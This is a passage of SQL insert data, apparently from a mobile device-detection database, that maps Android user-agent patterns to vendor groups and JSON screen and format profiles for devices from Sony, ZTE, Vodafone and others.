Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SHW-M110S) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_samsung','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ST15i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ST27i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; San Francisco II) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonE15i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonLT18a) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonLT18i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonLT18i-o) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonLT18iv) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonLT26i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonMT11i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonSK17iv) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonST15i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonST18i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonST27i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonWT19i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; SonyEricssonWT19i-o) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Sprint APA9292KT) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sprint','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Telcel T20) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; U8180) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; U8655-1) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; U8667) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; UM840) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Vodafone 858) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Vodafone Smart II) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_vodafone','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; WT19i) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_sony','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; XT320) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Y220-U00) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Y220-U05) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; YP-G70) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; Z768G) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ZTE V768) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ZTE V791) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 2.*; ZTE-SKATE) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 2.*; sdk) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 3.*; A501) AppleWebKit/* (KHTML, like Gecko) Safari/*','android3','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 3.*; Xoom) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_motorolax','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 09_v89_jbla828_hd) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 0PCV1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 0PCV1) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 1201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 2014811) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 2014813) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 2014817) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 2014818) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 2014819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 3006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 302KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 304SH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4003A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4003J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4009A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4009D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4009E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4009F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4009S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4009X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4013D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4013E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4013K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4013M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4013X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4018A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 401SO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4024D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4024E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4027A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4027D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4027X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4028E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4032D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4032D) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4035A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4035D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 404KC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4400) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 4G LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 5038D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 5038X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 5042A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 5042D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 5042X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 6016D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; 6016X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 